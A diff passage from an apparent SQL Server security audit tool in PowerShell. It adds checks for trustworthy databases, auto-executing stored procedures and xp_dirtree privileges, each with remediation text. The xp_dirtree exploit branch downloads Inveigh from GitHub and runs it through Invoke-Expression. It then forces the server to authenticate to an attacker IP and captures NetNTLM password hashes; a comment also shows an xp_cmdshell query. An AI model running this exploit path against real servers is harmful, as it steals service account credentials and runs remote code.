privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on the server.' + $Remediation = "Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it." + $Severity = 'Low' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = "[CurrentCommand] -Instance $Instance -Exploit" + $ExploitCmd = 'There is not exploit available at this time.' $Details = '' - $Reference = '' - $Author = 'First Last (Twitter), Company Year' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # $IsVulnerable = "No" or $IsVulnerable = "Yes" + # Select links configured with static credentials + $TrustedDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.DatabaseName -ne 'msdb' -and $_.is_trustworthy_on -eq 'True' + } + + # Update vulnerable status + if($TrustedDatabases) + { + $IsVulnerable = 'Yes' + $TrustedDatabases | + ForEach-Object -Process { + $DatabaseName = $_.DatabaseName + + Write-Verbose -Message "$Instance : - The database $DatabaseName was found configured as trustworthy." + $Details = "The database $DatabaseName was found configured as trustworthy." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + else + { + Write-Verbose -Message "$Instance : - No non-default trusted databases were found." + } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" + # Check if the link is alive and verify connection + check if sysadmin # ----------------------------------------------------------------- @@ -9604,13 +20460,12 @@ Function Invoke-SQLAuditTemplate # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" + # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') + # Also, recommend link crawler module - # Add to report example - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database" } End @@ -9625,14 +20480,14 @@ Function Invoke-SQLAuditTemplate # --------------------------------------- -# Invoke-SQLAuditPrivServerLink +# Invoke-SQLAuditPrivAutoExecSp # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivServerLink +Function Invoke-SQLAuditPrivAutoExecSp { <# .SYNOPSIS - Check if any SQL Server links are configured with remote credentials. + Check if any databases have been configured as trustworthy. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -9644,24 +20499,10 @@ Function Invoke-SQLAuditPrivServerLink .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE - PS C:\> Invoke-SQLAuditPrivServerLink -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Invoke-SQLAuditPrivAutoExecSp -Instance SQLServer1\STANDARDDEV2014 - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : Excessive Privilege - Linked Server - Description : One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote - server. - Remediation : Configure SQL Server links to connect to remote servers using the login's current security context. - Severity : Medium - IsVulnerable : Yes - IsExploitable : No - Exploited : No - ExploitCmd : Example query: SELECT * FROM OPENQUERY([Server01\SQLEXPRESS],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER') - Details : The SQL Server link Server01\SQLEXPRESS was found configured with the test login. - Reference : https://msdn.microsoft.com/en-us/library/ms190479.aspx - Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivServerLink -Verbose + PS C:\> Invoke-SQLInstanceLocal | Invoke-SQLAuditPrivAutoExecSp -Verbose #> [CmdletBinding()] Param( @@ -9697,6 +20538,29 @@ Function Invoke-SQLAuditPrivServerLink Begin { + # Table for output + $TblAutoExecPrivs = new-object System.Data.DataTable + $TblAutoExecPrivs.Columns.add('ComputerName') | Out-Null + $TblAutoExecPrivs.Columns.add('Instance') | Out-Null + $TblAutoExecPrivs.Columns.add('DatabaseName') | Out-Null + $TblAutoExecPrivs.Columns.add('SchemaName') | Out-Null + $TblAutoExecPrivs.Columns.add('ProcedureName') | Out-Null + $TblAutoExecPrivs.Columns.add('ProcedureType') | Out-Null + $TblAutoExecPrivs.Columns.add('ProcedureDefinition') | Out-Null + $TblAutoExecPrivs.Columns.add('SQL_DATA_ACCESS') | Out-Null + $TblAutoExecPrivs.Columns.add('ROUTINE_BODY') | Out-Null + $TblAutoExecPrivs.Columns.add('CREATED') | Out-Null + $TblAutoExecPrivs.Columns.add('LAST_ALTERED') | Out-Null + $TblAutoExecPrivs.Columns.add('is_ms_shipped') | Out-Null + $TblAutoExecPrivs.Columns.add('is_auto_executed') | Out-Null + $TblAutoExecPrivs.Columns.add('PrincipalName') | Out-Null + $TblAutoExecPrivs.Columns.add('PrincipalType') | Out-Null + $TblAutoExecPrivs.Columns.add('PermissionName') | Out-Null + $TblAutoExecPrivs.Columns.add('PermissionType') | Out-Null + $TblAutoExecPrivs.Columns.add('StateDescription') | Out-Null + $TblAutoExecPrivs.Columns.add('ObjectName') | Out-Null + $TblAutoExecPrivs.Columns.add('ObjectType') | Out-Null + # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') @@ -9717,7 +20581,7 @@ Function Invoke-SQLAuditPrivServerLink Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Server Link" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -9727,13 +20591,9 @@ Function Invoke-SQLAuditPrivServerLink { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure." Return } - else - { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS." - } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose @@ -9751,60 +20611,112 @@ Function Invoke-SQLAuditPrivServerLink { $TestMode = 'Audit' } - $Vulnerability = 'Excessive Privilege - Linked Server' - $Description = 'One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote server.' - $Remediation = "Configure SQL Server links to connect to remote servers using the login's current security context." - $Severity = 'Medium' + $Vulnerability = 'Excessive Privilege - Auto Execute Stored Procedure' + $Description = 'A stored procedured is configured for automatic execution and has explicit permissions assigned. This may allow non sysadmin logins to execute queries as "sa" when the SQL Server service is restarted.' + $Remediation = "Ensure that non sysadmin logins do not have privileges to ALTER stored procedures configured with the is_auto_executed settting set to 1." + $Severity = 'Low' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'There is not exploit available at this time.' - if($Username) - { - #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Username $Username -Password $Password -Exploit" - } - else - { - #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Exploit" - } $Details = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms190479.aspx' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration - # ----------------------------------------------------------------- - - # Select links configured with static credentials - $LinkedServers = Get-SQLServerLink -Verbose -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.LocalLogin -ne 'Uses Self Credentials' - } - - # Update vulnerable status - if($LinkedServers) - { - $IsVulnerable = 'Yes' - $LinkedServers | - ForEach-Object -Process { - $Details = - $LinkName = $LinkedServers.DatabaseLinkName - $LinkUser = $LinkedServers.RemoteLoginName - $LinkAccess = $LinkedServers.is_data_access_enabled - $ExploitCmd = "Example query: SELECT * FROM OPENQUERY([$LinkName],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER')" + # ----------------------------------------------------------------- + $IsVulnerable = 'Yes' - if($LinkUser -and $LinkAccess -eq 'True') - { - Write-Verbose -Message "$Instance : - The $LinkName linked server was found configured with the $LinkUser login." - $Details = "The SQL Server link $LinkName was found configured with the $LinkUser login." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + # Get list of autoexec stored procedures + $AutoProcs = Get-SQLStoredProcedureAutoExec -Verbose -Instance $Instance -Username $username -Password $password -Credential $credential + + # Get count + $AutoCount = $AutoProcs | measure | select count -ExpandProperty count + + if($AutoCount -eq 0){ + Write-Verbose "$Instance : No stored procedures were found configured to auto execute." + return + } + + # Get permissions for procs + Write-Verbose "$Instance : Checking permissions..." + $AutoProcs | + foreach-object { + + # Grab autoexec proc info + $ComputerName = $_.ComputerName + $Instance = $_.Instance + $DatabaseName = $_.DatabaseName + $SchemaName = $_.SchemaName + $ProcedureName = $_.ProcedureName + $ProcedureType = $_.ProcedureType + $ProcedureDefinition = $_.ProcedureDefinition + $SQL_DATA_ACCESS = $_.SQL_DATA_ACCESS + $ROUTINE_BODY = $_.ROUTINE_BODY + $CREATED = $_.CREATED + $LAST_ALTERED = $_.LAST_ALTERED + $is_ms_shipped = $_.is_ms_shipped + $is_auto_executed = $_.is_auto_executed + + # Get a list of explicit permissions + $Results = Get-SQLDatabasePriv -Verbose -DatabaseName master -SuppressVerbose -Instance $Instance -Username $username -Password $password -Credential $credential | + Where-Object {$_.objectname -like "$ProcedureName"} + + # Check if any permisssions exist + $PermCount = $Results | measure | select count -ExpandProperty count + + # Add record + if($PermCount -ge 1){ + + # Itererate through each permission + $Results | + ForEach-Object { + + # Grab permission info + $PrincipalName = $_.PrincipalName + $PrincipalType = $_.PrincipalType + $PermissionName = $_.PermissionName + $PermissionType = $_.PermissionType + $StateDescription = $_.StateDescription + $ObjectType = $_.ObjectType + $ObjectName = $_.ObjectName + + $FullSpName = "$DatabaseName.$SchemaName.$ProcedureName" + + # Add row to results + $TblAutoExecPrivs.Rows.Add( + $ComputerName, + $Instance, + $DatabaseName, + $SchemaName, + $ProcedureName, + $ProcedureType, + $ProcedureDefinition, + $SQL_DATA_ACCESS, + $ROUTINE_BODY, + $CREATED, + $LAST_ALTERED, + $is_ms_shipped, + $is_auto_executed, + $PrincipalName, + $PrincipalType, + $PermissionName, + $PermissionType, + $StateDescription, + $ObjectName, + $ObjectType + ) | Out-Null + + Write-Verbose -Message "$Instance : - $PrincipalName has $StateDescription $PermissionName on $FullSpName." + $Details = "$PrincipalName has $StateDescription $PermissionName on $FullSpName." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } - else - { - Write-Verbose -Message "$Instance : - No exploitable SQL Server links were found." - } + + #$TblAutoExecPrivs # ----------------------------------------------------------------- # Check for exploit dependancies @@ -9812,7 +20724,7 @@ Function Invoke-SQLAuditPrivServerLink # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin - + $IsExploitable = "Unknown" # ----------------------------------------------------------------- # Exploit Vulnerability @@ -9824,7 +20736,7 @@ Function Invoke-SQLAuditPrivServerLink # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database" } End @@ -9839,14 +20751,16 @@ Function Invoke-SQLAuditPrivServerLink # --------------------------------------- -# Invoke-SQLAuditPrivTrustworthy +# Invoke-SQLAuditPrivXpDirtree # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivTrustworthy +Function Invoke-SQLAuditPrivXpDirtree { <# .SYNOPSIS - Check if any databases have been configured as trustworthy. + Check if the current user has privileges to execute xp_dirtree extended stored procedure. + If exploit option is used, the script will inject a UNC path to the attacker's IP and capture + the SQL Server service account password hash using Inveigh. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -9857,28 +20771,33 @@ Function Invoke-SQLAuditPrivTrustworthy SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. + .PARAMETER AttackerIp + IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from. + .PARAMETER TimeOut + Number of seconds to wait for authentication from target SQL Server. .EXAMPLE - PS C:\> Invoke-SQLAuditPrivTrustworthy -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Invoke-SQLAuditPrivXpDirtree -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp 10.1.1.2 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : Excessive Privilege - Trustworthy Database - Description : One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database - and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules - that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on - the server. - Remediation : Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to - set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it. - Severity : Low + Vulnerability : Excessive Privilege - Execute xp_dirtree + Description : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force + the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized + access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats + because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default. + Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public + Severity : Medium IsVulnerable : Yes - IsExploitable : No - Exploited : No - ExploitCmd : There is not exploit available at this time. - Details : The database testdb was found configured as trustworthy. - Reference : https://msdn.microsoft.com/en-us/library/ms187861.aspx + IsExploitable : Yes + Exploited : Yes + ExploitCmd : Crack the password hash offline or relay it to another system. + Details : The public principal has EXECUTE privileges on XP_DIRTREE procedure in the master database. Recovered password hash! Hash type = + NetNTLMv1;Hash = SQLSvcAcnt::Domain:0000000000000000400000000000000000000000000000000:1CEC319E75261CEC319E759E7511E1CEC319E753AB7D: + Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivTrustworthy -Verbose + PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpDirtree -Verbose #> [CmdletBinding()] Param( @@ -9909,7 +20828,15 @@ Function Invoke-SQLAuditPrivTrustworthy [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit + [switch]$Exploit, + + [Parameter(Mandatory = $false, + HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')] + [string]$AttackerIp, + + [Parameter(Mandatory = $false, + HelpMessage = 'Time in second to way for hash to be captured.')] + [int]$TimeOut = 5 ) Begin @@ -9934,7 +20861,7 @@ Function Invoke-SQLAuditPrivTrustworthy Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Trusted Database" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_dirtree" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -9944,7 +20871,7 @@ Function Invoke-SQLAuditPrivTrustworthy { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_dirtree." Return } else @@ -9953,9 +20880,17 @@ Function Invoke-SQLAuditPrivTrustworthy } # Grab server information + # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName + $CurrentLogin = $ServerInfo.CurrentLogin + $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose + $CurrentPrincpalList = @() + $CurrentPrincpalList += $CurrentLogin + $CurrentPrincpalList += 'Public' + $CurrentLoginRoles | ForEach-Object -Process { + $CurrentPrincpalList += $_.RolePrincipalName + } # -------------------------------------------- # Set function meta data for report output @@ -9968,16 +20903,16 @@ Function Invoke-SQLAuditPrivTrustworthy { $TestMode = 'Audit' } - $Vulnerability = 'Excessive Privilege - Trustworthy Database' - $Description = 'One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on the server.' - $Remediation = "Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it." - $Severity = 'Low' + $Vulnerability = 'Excessive Privilege - Execute xp_dirtree' + $Description = 'xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' + $Remediation = 'Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public' + $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = 'There is not exploit available at this time.' + $ExploitCmd = 'Crack the password hash offline or relay it to another system.' $Details = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx' + $Reference = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- @@ -9985,48 +20920,184 @@ Function Invoke-SQLAuditPrivTrustworthy # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # Select links configured with static credentials - $TrustedDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.DatabaseName -ne 'msdb' -and $_.is_trustworthy_on -eq 'True' + # Get users and roles that execute xp_dirtree + $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript { + $_.ObjectName -eq 'xp_dirtree' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' } # Update vulnerable status - if($TrustedDatabases) + if($DirTreePrivs) { + # Status user + Write-Verbose -Message "$Instance : - At least one principal has EXECUTE privileges on xp_dirtree." + $IsVulnerable = 'Yes' - $TrustedDatabases | - ForEach-Object -Process { - $DatabaseName = $TrustedDatabases.DatabaseName - Write-Verbose -Message "$Instance : - The database $DatabaseName was found configured as trustworthy." - $Details = "The database $DatabaseName was found configured as trustworthy." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + if($Exploit){ + # Check if the current process has elevated privs + # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx + $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() + $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) + $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator + $IsAdmin = $prp.IsInRole($adm) + + if(-not $IsAdmin) + { + Write-Verbose -Message "$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh." + $IAMADMIN = 'No' + }else{ + Write-Verbose -Message "$Instance : - You have Administrator rights. Inveigh will be loaded." + $IAMADMIN = 'Yes' + } } - } - else - { - Write-Verbose -Message "$Instance : - No non-default trusted databases were found." - } + + $DirTreePrivs | + ForEach-Object -Process { + $PrincipalName = $DirTreePrivs.PrincipalName - # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution - # ----------------------------------------------------------------- - # $IsExploitable = "No" or $IsExploitable = "Yes" - # Check if the link is alive and verify connection + check if sysadmin + # Check if current login can exploit + $CurrentPrincpalList | + ForEach-Object -Process { + $PrincipalCheck = $_ + if($PrincipalName -eq $PrincipalCheck -or $PrincipalName -eq 'public') + { + $IsExploitable = 'Yes' - # ----------------------------------------------------------------- - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role - # ----------------------------------------------------------------- - # $Exploited = "No" or $Exploited = "Yes" - # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') - # Also, recommend link crawler module + # Check for exploit flag + if(($IAMADMIN -eq 'Yes') -and ($Exploit)) + { + # Attempt to load Inveigh from file + #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue | Out-Null + #Invoke-Expression($InveighSrc) + + # Get IP of current system + if(-not $AttackerIp) + { + $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 | + Select-Object -ExpandProperty Ipv4Address | + Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) + + if($AttackerIp -eq '127.0.0.1') + { + $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | + Select-Object -First 1 -Property @{ + Name = 'IPAddress' + Expression = { + [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value + } + } | + Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 + } + } + + # Attempt to load Inveigh via reflection + Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') + + $TestIt = Test-Path -Path Function:\Invoke-Inveigh + if($TestIt -eq 'True') + { + Write-Verbose -Message "$Instance : - Inveigh loaded." + + # Get IP of SQL Server instance + $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName) + + # Start sniffing for hashes from that IP + Write-Verbose -Message "$Instance : - Start sniffing..." + $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp + + # Randomized 5 character file name + $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) + + # Sent unc path to attacker's Ip + Write-Verbose -Message "$Instance : - Inject UNC path to \\$AttackerIp\$path..." + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_dirtree '\\$AttackerIp\$path'" -TimeOut 10 -SuppressVerbose + + # Sleep for $Timeout seconds to ensure that slow connections make it back to the listener + Write-Verbose -Message "$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back" + Start-Sleep -s $TimeOut + + # Stop sniffing and print password hashes + $null = Stop-Inveigh + Write-Verbose -Message "$Instance : - Stopped sniffing." + $HashType = '' + $Hash = '' + + [string]$PassCleartext = Get-Inveigh -Cleartext + if($PassCleartext) + { + $HashType = 'Cleartext' + $Hash = $PassCleartext + } + + [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 + if($PassNetNTLMv1) + { + $HashType = 'NetNTLMv1' + $Hash = $PassNetNTLMv1 + } + + [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 + if($PassNetNTLMv2) + { + $HashType = 'NetNTLMv2' + $Hash = $PassNetNTLMv2 + } + + if($Hash) + { + # Update Status + Write-Verbose -Message "$Instance : - Recovered $HashType hash:" + Write-Verbose -Message "$Instance : - $Hash" + $Exploited = 'Yes' + + $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" + } + else + { + # Update Status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. xp_dirtree Executed, but no password hash was recovered." + } + + # Clear inveigh cache + $null = Clear-Inveigh + } + else + { + Write-Verbose -Message "$Instance : - Inveigh could not be loaded." + # Update status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." + } + } + else + { + # Update status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database." + } + } + else + { + # Update status + $IsExploitable = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges the xp_dirtree procedure in the master database." + } + } + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + else + { + Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_dirtree." + } # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - XP_DIRTREE" } End @@ -10041,14 +21112,14 @@ Function Invoke-SQLAuditPrivTrustworthy # --------------------------------------- -# Invoke-SQLAuditPrivXpDirtree +# Invoke-SQLAuditPrivXpFileexist # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivXpDirtree +Function Invoke-SQLAuditPrivXpFileexist { <# .SYNOPSIS - Check if the current user has privileges to execute xp_dirtree extended stored procedure. + Check if the current user has privileges to execute xp_fileexist extended stored procedure. If exploit option is used, the script will inject a UNC path to the attacker's IP and capture the SQL Server service account password hash using Inveigh. .PARAMETER Username @@ -10066,28 +21137,10 @@ Function Invoke-SQLAuditPrivXpDirtree .PARAMETER TimeOut Number of seconds to wait for authentication from target SQL Server. .EXAMPLE - PS C:\> Invoke-SQLAuditPrivXpDirtree -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp 10.1.1.2 - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : Excessive Privilege - Execute xp_dirtree - Description : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force - the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized - access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats - because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default. - Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public - Severity : Medium - IsVulnerable : Yes - IsExploitable : Yes - Exploited : Yes - ExploitCmd : Crack the password hash offline or relay it to another system. - Details : The public principal has EXECUTE privileges on XP_DIRTREE procedure in the master database. Recovered password hash! Hash type = - NetNTLMv1;Hash = SQLSvcAcnt::Domain:0000000000000000400000000000000000000000000000000:1CEC319E75261CEC319E759E7511E1CEC319E753AB7D: - Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ - Author : Scott Sutherland (@_nullbind), NetSPI 2016 + PS C:\> Invoke-SQLAuditPrivXpFileexist -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp 10.1.1.2 .EXAMPLE - PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpDirtree -Verbose + PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpFileexist -Verbose #> [CmdletBinding()] Param( @@ -10151,7 +21204,7 @@ Function Invoke-SQLAuditPrivXpDirtree Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive 